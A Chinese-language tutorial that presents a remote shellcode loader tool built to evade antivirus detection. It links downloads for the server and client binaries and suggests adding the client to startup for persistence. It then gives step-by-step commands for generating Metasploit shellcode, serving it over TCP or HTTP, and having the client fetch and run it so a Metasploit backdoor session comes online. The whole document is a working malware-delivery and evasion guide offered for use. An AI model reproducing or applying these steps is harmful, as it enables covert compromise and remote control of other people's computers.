通過開發一組遠程代碼執行盒,可以動態實現對ShellCode代碼的動態載入,由於ShellCode不存放在本地客戶端常量區,所以在一定程度上可以減少被殺概率,客戶端只保留之基本的Socket通信功能,當需要時才會加載惡意代碼運行。
此工具分為服務端與客戶端,客戶端可以將其加入到開機自啟動列表,並傳入響應的參數即可,目前支持TCP/UDP/HTTP三種協議傳輸,后期可能會增加ICMP等來實現后門的傳輸工作。
服務端客戶端下載地址
Server 服務端: https://share.weiyun.com/gvNrdECD
Client 客戶端: https://share.weiyun.com/FsQ0Orcs
使用 TCP/UDP 隧道上線
1.首先MFS工具生成ShellCode代碼,代碼無需壓縮,直接保存為一下格式即可。
2.服務端執行命令,指定偵聽端口,以及需要傳輸的shellcode反彈后門路徑。
Server.exe RunServer --type tcp --listen 9999 --shellcode d://shellcode.txt
當服務器啟動后,會默認在本機,偵聽9999端口,等待客戶端獲取數據包。
2.啟動我們的MSF控制台,並設置為偵聽狀態。
3.此時客戶端執行,獲取命令即可。
Client.exe RunClient --type tcp --address 127.0.0.1 --port 9999
4.回到我們的MSF控制台,就可以看到客戶端已經上線了。
服務端與客戶端此時狀態如下,服務端發送數據后會顯示客戶端的IP地址來源。
MSF控制台則直接可以上線。
使用 HTTP 隧道上線
HTTP上線稍微復雜一些。
1.首先你需要手動將shellcode壓縮為一行,並命名為shellcode.raw文件,壓縮方式有多種,你可以使用我開發的shellcode注入器中的format函數完成。
2.當放入同級目錄后,直接啟動HTTP服務。
Server.exe RunServer --type http --listen 9999
3.此時我們可以通過瀏覽器,訪問一下看看是否啟動成功了。
4.客戶端執行,獲取命令即可。如下。
Client.exe RunClient --type http --address http://127.0.0.1:9999/shellcode.raw --port 9999
5.回到MSF中,可以看到已經成功上線了。
